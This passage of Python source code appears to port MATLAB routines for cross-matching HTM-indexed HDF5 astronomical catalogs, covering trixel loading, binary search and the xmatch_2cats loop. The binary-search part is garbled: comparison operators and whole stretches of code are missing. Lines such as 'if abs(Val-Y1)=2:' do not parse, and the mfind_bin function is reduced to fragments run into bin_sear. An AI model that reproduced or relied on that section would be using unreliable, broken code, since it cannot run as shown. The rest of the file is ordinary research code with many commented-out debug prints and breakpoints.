Ind=DataInd[I1,0] #the\n Offset=np.append(DataInd[I1,0]-1,0)\n if I1==I2:\n I2=I2+1\n I2=min(I2,Ndi-1)\n Block=[1+DataInd[I2,0]-DataInd[I1,0],Ncol]\n #print('Block is',Block)\n trixel_data=class_HDF5.HDF5(catalogs_dir+'/'+CatDir+'/'+Filename).load(Data_set_name,Offset=Offset,Block=Block,numpy_array=True,Verbose=Verbose).T\n #seach the indexes of the\n else:\n trixel_data=np.array([])\n Ind=None\n return trixel_data,Ind\n\ndef bin_sear(X,Val): #Util.find.of eran\n \"\"\"Description:\n Input :- sorted vector (ascending)\n - Value to search\n Output :- Index of closest value\n example:\n By : Maayane Soumagnac (original Matlab function by Eran Ofek) August 2018\"\"\"\n N=len(X)\n if N==1:\n IndVal=1\n else:\n Ind1=0\n Ind2=N-1\n IndM=math.floor(0.5*N)\n Y1=X[Ind1]\n Y2=X[Ind2]\n Ym=X[IndM]\n Found=0\n while Found==0:\n if Val>Ym:\n Ind1=IndM\n Y1=X[Ind1]\n if Ind2-Ind1>=2:\n IndM= math.floor(0.5*(Ind2+Ind1))\n else:\n Found=1\n if abs(Val-Y1)=2:\n IndM=math.floor(0.5*(Ind1+Ind2))\n else:\n Found=1\n if abs(Val-Y1)X[Im-1]\n #print('FlagU is',FlagU)\n FlagD=np.invert(FlagU)\n #print('FlagD is',FlagD)\n I1[FlagU]=Im[FlagU]\n I2[FlagD]=Im[FlagD]\n PrevIm=Im\n Im=np.floor(0.5*(I1+I2)).astype(int)\n #print('Im is',Im)\n #print('PrevIm is',PrevIm)\n return Im\n\ndef get_file_dataset_from_trixel_id(CatName,index,NfilesinHDF,Verbose=True):#get_file_var_from_htmid in Eran's library\n \"\"\"Description: given a catalog basename and the index of a trixel and the number of trixels in an HDF5 file,\n create the trixel dataset name\n Input :- CatName\n - index\n - NfilesinHDF: number of datasets in an HDF5 files (default is 100)\n Output :- Filename: name of the HDF5 file where the trixel_dataset is stored\n - Datasetname: name of the trixel_dataset\n example:\n By : Maayane Soumagnac (original Matlab function by Eran Ofek) August 2018\"\"\"\n\n\n if Verbose==True:\n print('index is',index)\n num_file=math.floor(index/NfilesinHDF)*NfilesinHDF #equivalent to index//Nfiles*Nfiles\n Filename='%s_htm_%06d.hdf5' % (CatName, num_file)\n DatasetName='htm_%06d' % index\n return Filename,DatasetName\n\ndef Number_of_trixels(Catname,catalogs_dir='./data',CatDir=None):\n \"\"\"Description: finds the number of trixels for a given catalod\n Input :- catalog basename\n Output :- number of trixels for this catalog\n example:\n By : Maayane Soumagnac (original Matlab function by Eran Ofek) August 2018\"\"\"\n\n IndexFileName = get_index_filename(Catname)[0] # name of the index file associated with Catname\n IndexVarName=get_index_filename(Catname)[1] # name of the data set containing the index filename content\n List_of_dict=load_HTM_ind(IndexFileName,IndexVarName,catalogs_dir=catalogs_dir,CatDir=CatDir)[0]\n Number_of_trixels_in_cat=len(List_of_dict)\n return Number_of_trixels_in_cat\n\ndef simplify_list(val):\n if isinstance(val, list) == False:\n return val\n else:\n if len(val) > 1:\n return val\n else:\n return simplify_list(val[0])\n\ndef simplify2(x):\n IDc=[]\n for i in x:\n if isinstance(i, (list, tuple, np.ndarray)) == True:\n for j in i:\n IDc.append(j)\n else:\n IDc.append(i)\n return IDc\n #return simplify2(IDc)\n\ndef simplify3(x):\n if isinstance(x[0],(list, tuple, np.ndarray)) == False:\n return x\n else:\n y=simplify2(x)\n #print(y)\n return simplify3(y)\n\ndef match_cats(Cat,Refcat,Radius=2,RadiusUnits='arcsec'):\n \"\"\"Description: translation of VO.search.match_cats of Eran. Given two spherical coordinate catalogs. - for each entry\n in the reference catalog (second input argument), search for all nearby sources in the catalog (first input).\n Input :- A catalog sorted by declination. Ra and Dec in Rad\n - A reference catalog. Ra and Dec in rad\n - 'Radius' - Search radius. This is either a scalar or a vector which length is identical to that of the reference\n catalog (second input). If a vector than each source in the reference catalog may have a different search radius.\n Default is 2 (arcsec).\n - 'RadiusUnits' - Search radius units. See convert.angular for options. Default is 'arcsec'.\n Output :-Vec: a dictionnary with the following keys\n Vec['Nfound']= A vector, the size of RefCat, with the number of sources found in the catalog Cat that are within the search radius from the source with same indice in refcat. in the reference catalog.\n Vec['MinDist']=A vector, the size of RefCat, with the minimum distance (radians) of matched sources in Cat to the source of same indice in RefCat. NaN if not found.\n - Res: a list of dictionnaries (one item per *matched* refernce source! this list is not the size of cat1, it is the size of the\n number of objects in cat1 that DO have at least one cross-matched object in cat2):\n Res['IndRef']=Index of source in reference catalog.\n Res['IndCat']=List of indices in the catalog that are matched to\n% the 'IndRef' source of the reference catalog.\n Res['Dist']= Vecor of angular distances (radians) for each one\n% of the sources indicated in 'IndCat'.\n Res['Num']=Number of sources within search radius\n - IndCatMinDist: vector, the size of Refcat, with the indice of the cat2 nearest sources to the cat1 source of indice Res[Indref]. NaN if no source was found\n example:\n By : Maayane Soumagnac (original Matlab function by Eran Ofek) August 2018\"\"\"\n\n if RadiusUnits=='rad':\n Radius=Radius\n if RadiusUnits=='arcsec':\n Radius=math.pi*Radius/(180.*3600.)\n\n Ncat=np.shape(Cat)[0]\n #print('Ncat is',Ncat)#ok\n #print('Refcat is',Refcat)\n Nref=np.shape(Refcat)[0]\n #print('Nref is', Nref)#ok\n Radius=Radius*np.ones(Nref)\n Res=[]\n Iuppx=mfind_bin(Cat[:,1],Refcat[:,1]+Radius) #only if second column is dec!\n Ilowx=mfind_bin(Cat[:,1],Refcat[:,1]-Radius) #only if second column is dec!\n #print('Iupx is',Iuppx)#ok\n #print('Ilowx is',Ilowx)#ok\n Ilow=np.zeros(np.shape(Ilowx)[0])\n for r,s in enumerate(Ilowx):\n Ilow[r]=max(1,Ilowx[r])\n #Ilow=np.max(1,Ilowx)\n\n Iupp=np.zeros(np.shape(Iuppx)[0])\n for r,s in enumerate(Iuppx):\n Iupp[r]=min(Ncat,Iuppx[r]+1)\n #print('Iup is',Iupp)#ok\n #print('Ilow is',Ilow)#ok\n Ncand=Iupp-Ilow\n Ic=np.array(np.where(Ncand>=1))[0]\n #print('Ic is',Ic)\n #print(np.shape(Ic))\n #print('Ic is',Ic)#index where condition verified, same as matlab one -1\n Nc=np.shape(Ic)[0]\n #print('Nc is',Nc)\n #pdb.set_trace()\n\n Vec=dict()\n Vec['Nfound']=np.zeros(Nref)\n #vectornan=np.empty(Nref)\n #vectornan[:]=np.nan\n Vec['MinDist']=np.full(Nref, np.nan)#vectornan\n Vec['MinPa']=np.full(Nref, np.nan)#vectornan\n K=0\n IndCatMinDist=np.full(Nref, np.nan)#vectornan\n\n for Icr in range(Nc):\n #print(\"Vec['MinDist']5 is\", Vec['MinDist'])\n #print('Nc is',Nc)\n Iref=Ic[Icr]\n #print('Iref is',Iref)#ok\n #pdb.set_trace()\n Icat=np.linspace(Ilow[Iref],Iupp[Iref],Iupp[Iref]-Ilow[Iref]+1).astype(int)\n #print('Icat is',Icat)#ok\n #print('Cat[Icat-1,0] is',Cat[Icat-1,0])#ok\n #print('Cat[Icat-1,1] is',Cat[Icat-1,1])#ok\n #print('Refcat[Iref,0]',Refcat[Iref,0])#ok\n #print( 'Refcat[Iref,1]) is',Refcat[Iref,1])#ok\n Dist=celestial.sphere_dist_fast(Cat[Icat-1,0],Cat[Icat-1,1],Refcat[Iref,0],Refcat[Iref,1])[0]\n #print('Dist is',Dist)\n #print('Radius[Iref] is',Radius[Iref])\n IndRelative=np.where(Dist<=Radius[Iref])[0]\n IndCat=Ilow[Icr]-1+IndRelative\n #print('IndRelative is',IndRelative)#ok\n #print('IndCat is',IndCat)#ok\n Vec['Nfound'][Iref]=np.shape(IndCat)[0]#ok\n #print(\"Vec['Nfound'][Iref] is\",Vec['Nfound'][Iref])#ok\n #pdb.set_trace()\n if Vec['Nfound'][Iref]>0:\n Vec['MinDist'][Iref]=np.min(Dist[IndRelative])\n MinInd=np.argmin(Dist[IndRelative])\n Resi=dict()\n K=K+1\n Resi['IndCat']=IndCat\n Resi['IndRef']=Iref\n Resi['Num']=np.shape(IndCat)[0]\n Resi['Dist']=Dist[IndRelative]\n Res.append(Resi)\n #print(\"Vec['MinDist'] 1.5 is\", Vec['MinDist'])\n IndCatMinDist[Iref]=IndCat[MinInd]\n ##print('IndCatMinDist[Iref] is {0} and p.min(Dist[IndRelative]) is {1}'.format(IndCatMinDist[Iref],np.min(Dist[IndRelative])) )\n # #print(\"Vec['MinDist'] 1.8 is\", Vec['MinDist'])# ca met IndCatMinDist[Iref] dans Vec['MinDist'][Iref]\n # print(\"Vec['MinDist'] 2 is\", Vec['MinDist'])\n #print(\"Vec['MinDist'] 3 is\", Vec['MinDist'])\n #pdb.set_trace()\n #print(\"Vec['MinDist'] 4 is\", Vec['MinDist'])\n #pdb.set_trace()\n return Vec,Res,IndCatMinDist #Match,Ind,IndCatMinDist\n\ndef Save_cross_matched_catalogs(Cat1,Cat2Matched,output_dir=None):\n \"\"\"Description: save the outputs of xmatch_2cats, in a directory with\n Input :- Catalog 1 basename\n - Catalog 2 basename\n -Search_radius: default is 2\n -Search_radius_units: default is arcsec\n -QueryFun: function to be applied to the catalog\n -QUeryFunPar: parameters for QueryFun\n Output :\n example:\n By : Maayane Soumagnac (original Matlab function by Eran Ofek) August 2018\n \"\"\"\n\n'''\ndef Example_QueryAllFun(Cat1,Ind,Cat2,IndCatMinDist,i):\n print('I am running Example_QueryAllFun')\n print('Cat1 is',Cat1)\n print('Ind is',Ind)\n print('Cat2 is',Cat2)\n print('IndCatMinDist is',IndCatMinDist)\n np.save(\"./Cat1_\"+str(i)+'.txt',Cat1)\n return Cat1\n'''\n\ndef Example_QueryAllFun(Cat1,Ind,Cat2,IndCatMinDist,i,additionnal_args=None):\n print('****** I am running Example_QueryAllFun *******')\n print(\"Cat1, the content of the catalog_1's trixel is\",Cat1)\n print(\"Cat2, the content of a catalog_2' trixel overlapping with Cat1 is\", Cat2)\n print(\"Ind is a list of dictionnaries, with one dictionnary per Cat1's object having one or more counterparts in Cat2; \")\n print(\"\"\"Ind[i][\"IndRef\"]=Index of the Cat1's source having one or more counterpart in Cat2\"\"\")\n print(\"\"\"Ind[i][\"IndCat\"]=List of indixes of the Cat2's counterparts.\"\"\")\n print(\"\"\"Ind[i][\"Dist\"]= Vecor of angular distances (radians) between the Cat1's source and its counterparts in Cat2\"\"\")\n print('Ind:',Ind)\n print(\"IndCatMinDist is a vector, with as many elements as lines in Cat1, with 'nan' at lines where there is no counterpart in Cat2, and at line where there is, the catalog_2's index of the closest counterpart\")\n print('IndCatMinDist:',IndCatMinDist)\n if additionnal_args is not None:\n np.savetxt(additionnal_args[0]+\"/Cat1_\"+str(i)+'.txt',Cat1)\n else:\n np.savetxt(\"./Cat1_\" + str(i) + '.txt', Cat1)\n print('***********************************************')\n print('press \"c\" to continue, \"q\" to quit')\n pdb.set_trace()\n return Cat1\n\ndef xmatch_2cats(Catname1,Catname2,Search_radius=2,QueryAllFun=None,QueryAllFunPar=None,\n catalogs_dir='./data',Verbose=False,save_results=False,save_in_one_file=True,\n save_in_separate_files=True,output='./cross-matching_results',time_it=True,Debug=False):\n \"\"\"Description: cross match two HDF5/HTM catalogs: for each source in the first catalog, the index of the nearest source in the second catalog\n (nearest within some specified distance) is saved.\n Input :- Catalog 1 basename\n - Catalog 2 basename\n -Search_radius: default is 2 (in arcsec)\n -QueryFun: function to be applied to the catalog\n -QUeryFunPar: parameters for QueryFun\n -Verbose: set to True if yu want the code to tell you what it is doing at each step and output intermediate outputs\n -save_results: if True the the cross-matching pieces of catalog_1 and catalog_2 will be saved. Beware: only on object of catalog 2 (the closest)\n is saved per object of catalog 1 having a counterpart.\n -save_in_one_file: if True the results will be saved in one file, of which the first columns are of catalog1 (only those for which\n cross matching entries in catalog_2 were found), and then come the columns of catalog2\n -save_in_two_files: if True the results will be saved in two separate files. One has the entries of catalog_1 having at least one counterpart in catalog2\n and the second is the entries of catalog 2 for the closest counterparts of catalog_2\n -catalogs_dir: the directory where the HDF5 catalogs are stored\n Output : if save_results=True, the cross-matching pieces of catalog_1 and catalog_2 are stored in the output directory given as the \"output\" key.\n example: catsHTM.xmatch_2cats('FIRST','NVSS',Verbose=False,save_in_one_file=True,save_results=True,save_in_separate_files=True)\n By : Maayane Soumagnac (original Matlab function by Eran Ofek) August 2018\n \"\"\"\n\n #Converts search_radius into radians\n\n Rad = 180. / math.pi\n Search_radius=Search_radius/(Rad*3600) #converts arcsec radius into radians radius\n\n ###### find the max level between the level of each catalog #####\n\n CatDir1=get_CatDir(Catname1) #le catalog 1 sous forme de numpy array\n CatDir2=get_CatDir(Catname2) #le catalog 1 sous forme de numpy array\n ##if Verbose==True:\n\n\n IndexFileName1 = get_index_filename(Catname1)[0] # name of the index file associated with Catname\n IndexVarName1 = get_index_filename(Catname1)[1] # name of the data set containing the index filename content\n HTM1 = load_HTM_ind(IndexFileName1, IndexVarName1, catalogs_dir=catalogs_dir, CatDir=CatDir1)[0]#content of the catalog index file into a dictionnary\n\n IndexFileName2 = get_index_filename(Catname2)[0] # name of the index file associated with Catname\n IndexVarName2 = get_index_filename(Catname2)[1] # name of the data set containing the index filename content\n HTM2 = load_HTM_ind(IndexFileName2, IndexVarName2, catalogs_dir=catalogs_dir,\n CatDir=CatDir2)[0]\n\n N_trixels_1=Number_of_trixels(Catname1,catalogs_dir=catalogs_dir,CatDir=CatDir1) # number of trixels in catalog 1\n N_trixels_2=Number_of_trixels(Catname2,catalogs_dir=catalogs_dir,CatDir=CatDir2) # number of trixels in catalog 2\n #if Verbose==True:\n print('Catalog_1 is {0} ({1} trixels)'.format(Catname1,N_trixels_1))\n print('Catalog_2 is {0} ({1} trixels)'.format(Catname2, N_trixels_2))\n\n #print('Catalog_2 is', CatDir2)\n #print('The number of trixels in {0} is {1}'.format(CatDir1,N_trixels_1))\n #print('The number of trixels in {0} is {1}'.format(CatDir2,N_trixels_2))\n\n L1=celestial.number_of_trixels_to_level(N_trixels_1)[0] #number of levels in catalog 1\n L2=celestial.number_of_trixels_to_level(N_trixels_2)[0] #number of levels in catalog 2\n\n if Verbose==True:\n print('The level of {0} is {1}'.format(Catname1,L1))\n print('The level of {0} is {1}'.format(Catname2,L2))\n\n Lmax=max(L1,L2)\n if Verbose==True:\n print('Lmax is',Lmax)#ok compared with Eran; maximum level between cat1 and cat2\n\n ####### Create the list of trixel's indexes associated with each level #########\n print('************** I am building all the trixels relevant to our search **************')\n\n built_array = celestial.htm_build(Lmax,Verbose=Verbose)\n HTM=built_array[0]\n Level=built_array[1] #une liste de Lmax dictionnaires, tels que dic['level']=un nombre designant le level (0 pour le level1) et dic['ptr']=un np array des indices des rixels a ce level\n #print(HTM[0].coo())\n #pdb.set_trace()\n #print('HTM[0] is',HTM[0])#ok compared with eran\n #print('HTM[1] is', HTM[1])#ok compared with Eran\n #print('HTM[0][coo] is',HTM[0]['coo'])#ok w Eran\n #print('HTM[8][coo] is', HTM[8]['coo'])# ok\n #print('HTM[9][coo] is', HTM[9]['coo'])#ok\n #print('HTM[10920][coo] is',HTM[10920]['coo'])#ok\n\n #('HTM[10920] is',HTM[10920])\n #pdb.set_trace()\n\n Level1=Level[L1-1] # le dictionnaire de Level correspondant au level L1: Level1['Level']=L1-1 et Level1['ptr']= le unumpy array des index des trixesls a ce niveau\n Level2=Level[L2-1]\n if Verbose==True:\n print('Level1:',Level1)\n print('Level2:',Level2)\n\n Nh1=len(Level1['ptr'])#the number of trixels in the highest level\n print('The number of trixels in the highest level, for {0} is {1}'.format(Catname1,Nh1))#ok\n #pdb.set_trace()\n Nh2=len(Level2['ptr'])\n print('The number of trixels in the highest level, for {0} is {1}'.format(Catname2, Nh2)) #ok\n #pdb.set_trace()\n\n ColCell2=load_colcell(catalogs_dir+'/'+CatDir2,Catname2)[0]\n ColUnits2=load_colcell(catalogs_dir+'/'+CatDir2,Catname2)[1]\n Ncol2=np.shape(ColCell2)[0]\n\n ColCell1=load_colcell(catalogs_dir+'/'+CatDir1,Catname1)[0]\n ColUnits1=load_colcell(catalogs_dir+'/'+CatDir1,Catname1)[1]\n Ncol1=np.shape(ColCell1)[0]\n if Verbose==True:\n print('{0} has the following fields {1}'.format(CatDir1,ColCell1))\n print('in units',ColUnits1)\n print('{0} has the following fields {1}'.format(CatDir2, ColCell2))\n print('in units', ColUnits2)\n #At this stage, we have 2 Level dictionnaries, one per each catalog, such that LevelX['level'] is the number of the highest level (0 for level 1)\n # and LevelX['ptr'] is the list of trixels indexes at the highest level\n #Next, we go through all the highest level trixels of Catalog 1, and for each trixel, if it contains sources, we check if there are some overlapping trixels in catalog 2\n\n if save_results == True:\n if os.path.exists(output):\n print('the output directory, ' + output + ' exists already')\n else:\n os.mkdir(output)\n header1 = \",\".join([Catname1+':'+ColCell1[i] + ' (' + ColUnits1[i] + ')' for i in range(np.shape(ColCell1)[0])])\n header2 = \",\".join([Catname2+':'+ColCell2[i] + ' (' + ColUnits2[i] + ')' for i in range(np.shape(ColCell2)[0])])\n cross_matching_result = np.empty((1, np.shape(ColCell1)[0] + np.shape(ColCell2)[0]))\n #print(np.shape(cross_matching_result))\n #print('header1 is',header1)\n #print('header2 is', header2)\n #print(header1+','+header2)\n if save_results==True:\n if save_in_one_file==True:\n if os.path.exists(output + '/cross-matching_result_full.txt'):\n print('the txt file exists already, I am removing it')\n os.remove(output + '/cross-matching_result_full.txt')\n if save_in_separate_files==True:\n if os.path.exists(output + '/cross-matching_result_{0}.txt'.format(Catname1)):\n print('the txt file for {0} exists already, I am removing it'.format(Catname1))\n os.remove(output + '/cross-matching_result_{0}.txt'.format(Catname1))\n if os.path.exists(output + '/cross-matching_result_{0}.txt'.format(Catname2)):\n print('the txt file for {0} exists already, I am removing it'.format(Catname2))\n os.remove(output + '/cross-matching_result_{0}.txt'.format(Catname2))\n\n #print(\"Level1['ptr'] is\", Level1['ptr'])\n #np.savetxt('indexes.txt',Level1['ptr'])\n print('************** I am looking for overlapping trixels **************')\n start = time.time()\n if Debug == True:\n print('I will stop at the following indexes, if the trixels exists, to debug, ok? press c to continue',\n [Nh1//1000,Nh1//200,Nh1 // 100, Nh1 //10, Nh1 //4, Nh1 //3, Nh1 // 2, Nh1 // 1.5])\n pdb.set_trace()\n for i in range(Nh1): #for each trixels in the highest level of Cat1\n #print(\"Level1['ptr'][Nh1-1] is\",Level1['ptr'][Nh1-1])\n #print(\"Level1['ptr'][i] is\",Level1['ptr'][i])\n\n index_cat1=Level1['ptr'][i]# takes the index of this trixel and check if this trixel contains sources:\n #print('I am looking for Catalog_2 ({0}) trixels overlapping with the trixel #{2} of Catalog_1 ({1})'.format(Catname2,Catname1,index_cat1))\n if HTM1[index_cat1-1]['Nsrc']>0:#if the trixel contains sources:\n #if index_cat1==27305:\n\n print('I am looking for Catalog_2 ({0}) trixels overlapping with the non-empty trixel #{2} ({3}/{4}) of Catalog_1 ({1})'.format(\n Catname2, Catname1, index_cat1,i,Nh1))\n if Verbose==True:\n print('there are {0} sources in this trixel'.format(HTM1[index_cat1-1]['Nsrc']))\n #print('not empty')\n #print('I am looking for Catalog_2 ({0}) trixels overlapping with the trixel #{2} of Catalog_1 ({1})'.format(Catname2,Catname1,index_cat1))\n #print('the file with index {0} has {1} sources'.format(index_cat1,HTM1[index_cat1]['Nsrc']))\n #start = time.time()\n Cat1=load_trix_by_ind(Catname1,index_cat1,num=100,catalogs_dir=catalogs_dir,Verbose=Verbose)[0]#load the content of that trixel (in the form of a numpy array)\n #ongoing1=time.time()\n #print(Cat1)#ok\n #Cat 1 is a numpy array with the content of a trixel that contains sources, at the highest level of Catalog1\n #PolesCoo ok\n #print(\"HTM[index_cat1-1]['coo'] is\",HTM[index_cat1-1]['coo'])#ok\n\n\n MeanRa=np.mean(HTM[index_cat1-1]['coo'][:,0]) # le meam Ra de ce trixel\n MeanDec=np.mean(HTM[index_cat1-1]['coo'][:,1]) # le mean Dec de ce trixel\n\n MinDec=np.min(HTM[index_cat1-1]['coo'][:,1])-Search_radius\n MaxDec = np.max(HTM[index_cat1 - 1]['coo'][:, 1]) + Search_radius\n #print('MeanRa is', MeanRa) #ok\n #print('MeanDec is',MeanDec)#ok\n\n D=celestial.sphere_dist_fast(MeanRa,MeanDec,HTM[index_cat1-1]['coo'][:,0],HTM[index_cat1-1]['coo'][:,1])[0]\n #print('D is',D)\n CircRadius=np.max(D)+Search_radius\n #print('CircRadius is',CircRadius)\n ID2=celestial.htm_search_cone(HTM2,MeanRa,MeanDec,CircRadius,Ind=[])\n #if Verbose==True:\n ID2w=simplify3(ID2)\n ongoing2 = time.time()\n if Verbose==True:\n print('there are {0} trixel overlapping with it'.format(len(ID2w)))#ok\n #pdb.set_trace()\n print('the list of trixels indexes of Catalog_2({0}) overlapping with the trixel #{2} of Catalog_1({1}) is {3}'.format(\n Catname2, Catname1, index_cat1,ID2w))\n #print('the list without brakets is',ID2w)# a list of indexes of cat2 trixels, which overlap with the cat1 trixel\n\n #load all the data corresponding to ID2w\n Nid2=len(ID2w) #the number of trixels of cat 2 overlapping with the given trixel of cat1 which we are examining.\n\n for s in range(Nid2):#for all trixels of catalog 2 overlapping with the given trixel of catalog1\n if s==0:\n [Cat2,Ind2]=load_trix_by_ind(Catname2,ID2w[s],[MinDec,MaxDec],catalogs_dir=catalogs_dir,Ncol=Ncol2,Verbose=Verbose)\n N2=np.shape(Cat2)[0]\n #Cat2ID=np.array(list(zip(ID2w[i]*np.ones(N2),Ind2+np.array(range(N2)))))#MAYBE Ind2-1?\n #print('len(Cat2) after i=0 is',len(Cat2))\n #pdb.set_trace()\n else:\n if Verbose==True:\n print('**********')\n print(\"(catalog_2) {0}'s trixel (overlapping with (catalog_1) {1}'s trixel) of index {2}:\".format(Catname2,Catname1,index_cat1))\n [Cat2tmp,Ind2]=load_trix_by_ind(Catname2,ID2w[s],[MinDec,MaxDec],catalogs_dir=catalogs_dir,Ncol=Ncol2,Verbose=Verbose)\n #print('i={0},shape(Cat2) and shape(Cat2tmp) are {1} and {2}'.format(i,np.shape(Cat2),np.shape(Cat2tmp)))\n #pdb.set_trace()\n #ongoing3 = time.time()\n if len(Cat2)>0:\n #print('at this (1) stage len(Cat2) is',len(Cat2))\n #print('Cat2tmp (1) is',Cat2tmp)\n if len(Cat2tmp)>0:\n Cat2=np.vstack((Cat2,Cat2tmp))\n N2 = np.shape(Cat2)[0]\n #else:\n\n #Cat2ID=np.vstack((Cat2ID,np.array(list(zip(ID2w[i]*np.ones(N2),Ind2+np.array(range(N2)))))))#MAYBE Ind2-1?\n #else: Cat2 reste tel quel\n else:#si Cat2 etait vide\n #print('at this (2) stage len(Cat2) is',len(Cat2))\n #print('Cat2 was empty?')\n if len(Cat2tmp)>0:#si Cat2tmp n'est pas vide, Cat2 devient lui\n #print('Cat2tnp.argwhere(np.isnan(x))mp (2) is',Cat2tmp)\n Cat2=np.copy(Cat2tmp)\n N2 = np.shape(Cat2)[0]\n #print('Cat 2 is', Cat2)\n #pdb.set_trace()\n #Cat2ID=np.vstack((Cat2ID,np.array(list(zip(ID2w[i]*np.ones(N2),Ind2+np.array(range(N2)))))))#MAYBE Ind2-1?\n #else: Cat2 reste vide\n #print('Cat2 is',Cat2)\n #print('len(Cat2) is',len(Cat2))\n #print('np.shape(Cat1) is',np.shape(Cat1))\n #print('np.shape(Cat2) is', np.shape(Cat2))\n #ongoing4 = time.time()\n # C'est quoi Cat2? Cat2 is a catalog with the content of *all the Catalogue 2 trixels overlapping with the given trixel of cat1\n # C'est quoi Cat2ID?*\n\n #print('Cat2 before sorting is',Cat2)\n #print('Cat2[:, 1] is',Cat2[:,1] )\n #pdb.set_trace()\n #print('len(Cat2) after the loop is',len(Cat2))\n #pdb.set_trace()\n if len(Cat2)>0:\n cat2=Cat2[Cat2[:, 1].argsort(),] #cat2 est Cat2 -l'ensemble des trixels qui overlappent cat1 -trié par Dec croissant. On a besoin de ca pour applyer match_cats.\n #np.savetxt('cat2.txt', cat2)\n #SI=Cat2[:, 1].argsort() #SI est les indexes de Dec croissants de Cat2\n #print('SI is',SI)# ok, verifie avec matlab\n #probleme: cat 2 c est toutes les sources des overlapping trixels. Nous on veut que les sources reelelemt overlapping. donc on run match_cat\n #ongoing5 = time.time()\n [Match,Ind,IndCatMinDist]=match_cats(cat2,Cat1,Radius=Search_radius,RadiusUnits='rad')\n\n if QueryAllFun is not None:\n #if i==0:\n # Data=np.array([])\n #else:\n Data=QueryAllFun(Cat1,Ind,Cat2,IndCatMinDist,i,additionnal_args=QueryAllFunPar)\n #ongoing6 = time.time()\n\n #Match:a dictionnary with the following keys\n #Match['Nfound']= a vector, the length of cat1, with the number of sources found in the cat2 that are within the search radius from the source in the reference catalog Cat1.\n #Match['MinDist']=a vector, the size of cat1, wiht the Minimum distance (radians) of sources in cat2 to the source in cat1. NaN if not found\n #Ind: a list of dictionnaries (as many as sources in Cat1 THAT HAVE CROSS-MTACHED SOURCES in cat2)\n # Ind[i]['IndRef']=Indice of source in cat1\n # Ind[i]['IndCat']=List of indices in cat2 that are matched to the 'IndRef' source of Cat1.\n # Ind[i]['Dist']= Vecor of angular distances (radians) for each one of the sources indicated in 'IndCat'.\n # Ind[i]['Num']=Number of sources within search radius\n # IndCatMinDist: a vector of indices of cat2 objects which are the closest to the source in cat1. NaN if not found ??\n\n #print(\"Match['Nfound'] is\",Match['Nfound']) #ok, verifie avec matlab\n #print(\"Match['MinDist'] is\", Match['MinDist']) #ok, verifie avec matlab\n #print(\"Match['MinPA'] is\", Match['MinPa']) #ok, verifie avec matlab\n #print(\"Ind is\",Ind)\n #print(\"the Ind['Num'] are:\",[Ind[i]['Num'] for i in range(len(Ind))]) # ok\n #print(\"the Ind['IndCat'] are:\", [Ind[i]['IndCat'] for i in range(len(Ind))]) # ok, moi=matlab-1, normal\n #print(\"the Ind['IndRef'] are:\", [Ind[i]['IndRef'] for i in range(len(Ind))]) # ok, moi=matlab-1, normal\n #print(\"the Ind['Dist'] are:\", [Ind[i]['Dist'] for i in range(len(Ind))]) # ok\n #pdb.set_trace()\n #print('IndCatMinDist is',IndCatMinDist)#ok, moi=matlab-1, normal\n #print('the shape of IndCatMinDist is',np.shape(IndCatMinDist)[0]) #ok\n \"\"\" if (~isempty(InPar.QueryAllFun))\n % execute InPar.QueryAllFun\n % QueryAllFun(Cat1,Ind,Cat2,varargin)\n if (Ih1==Istart)\n Data = [];\n end\n\n Data = InPar.QueryAllFun(Cat1,Ind,Cat2,IndCatMinDist,InPar.QueryAllFunPar{:},'Data',Data,'Ih1',Ih1,'Nh1',Nh1,'SearchRadius',InPar.SearchRadius);\n end\"\"\"\n IsN=np.isnan(IndCatMinDist)# un tableau de booleans qui est True la ou il y a zero sources cross-matched, et False la ou il y en a\n #print('IsN is',IsN)\n #print('IsN is',IsN) ok, mais moi c est des True et False et matlab c est des 0 et 1\n #print('the shape of IsN is',np.shape(IsN)) ok\n IndCatMinDist[IsN]=True #\n #if V\n #print('IndCatMinDist is now',IndCatMinDist) # un tableau de la taille de cat1 avec : la ou il y a pas de cross-matched dans cat2: 1, et la ou il y en a: l'indice de l'objet de cat2 le plus proche\n \"\"\"\n ceci: pas clair a quoi ca sert dans le code de matlab. Je laisse tomber.\n print(\"Cat2ID is\",Cat2ID) #ok mais pas sur qu'il dooivent etre identiques\n print(\"SI[IndCatMinDist.astype(int)] is\",SI[IndCatMinDist.astype(int)]) #pas ok\n pdb.set_trace()\n DataInd=Cat2ID[SI[IndCatMinDist.astype(int)],:]\n DataInd[IsN,:]=np.nan\n print('DataInd is', DataInd) # pareil que matlab mais pas sur que c est bien\n \"\"\"\n #print(\"IndCatMinDist.astype(int) is\",IndCatMinDist.astype(int))\n #print(\"np.shape(cat2)\",np.shape(cat2))\n #print(\"np.shape(IndCatMinDist)\",np.shape(IndCatMinDist))\n #print(\"np.shape(IndCatMinDist.astype(int))\",np.shape(IndCatMinDist.astype(int)))\n\n #print(\"cat2[IndCatMinDist.astype(int)-1,:] is\",cat2[IndCatMinDist.astype(int)-1,:])\n #print('IndCatMinDist.astype(int)-1 is',IndCatMinDist.astype(int)-1)\n #print(\"cat2[IndCatMinDist.astype(int),:] is\", cat2[IndCatMinDist.astype(int), :])\n #print('IndCatMinDist.astype(int) is', IndCatMinDist.astype(int))\n indexes_analog_to_matlab=np.zeros(np.shape(IndCatMinDist))\n indexes_analog_to_matlab[IndCatMinDist!=1]=IndCatMinDist[IndCatMinDist!=1]\n #THIS CHECK IS CRUCIAL! DON'T ARAISE\n #if Verbose==True:\n # print('i (or matlab Ih1-1)={0},indexes_analog_to_matlab must be matlab Indcatmindist-1 everywhere, check if this is the case: {1}'.format(i,indexes_analog_to_matlab))#ok\n #\n Cat2matched = cat2[indexes_analog_to_matlab.astype(int), :]#ok\n #Cat2matched=cat2[IndCatMinDist.astype(int),:]\n #Cat2matched=cat2[IndCatMinDist.astype(int),:]\n #print('cat2 is,',cat2)\n # Cat2matched est un tableau, de la longueur de cat1 avec:\n # -la ligne 0 de cat2 si la ligne correspond a un indice de cat1 qui a pas de cross-match\n # -s'il y a un cross-matched dans cat2: la ligne de cat2\n #print(\"np.shape(Cat2matched)\",np.shape(Cat2matched))\n #print(\"np.shape(IsN)\",np.shape(IsN))\n Cat2matched[IsN,:]=np.nan #\n #print('Cat2matched is', Cat2matched)\n if Debug==True:\n if i in [Nh1//1000,Nh1//200,Nh1 // 100, Nh1 //10, Nh1 //4, Nh1 //3, Nh1 // 2, Nh1 // 1.5]:\n print('******** i={0} ********'.format(i))\n print('I am saving Cat2matched')\n np.savetxt(output+'Cat2matched_{0}_4debug.txt'.format(i),Cat2matched) #pas ok\n pdb.set_trace()\n #print('Cat2matched at the index of IndCatMinDist 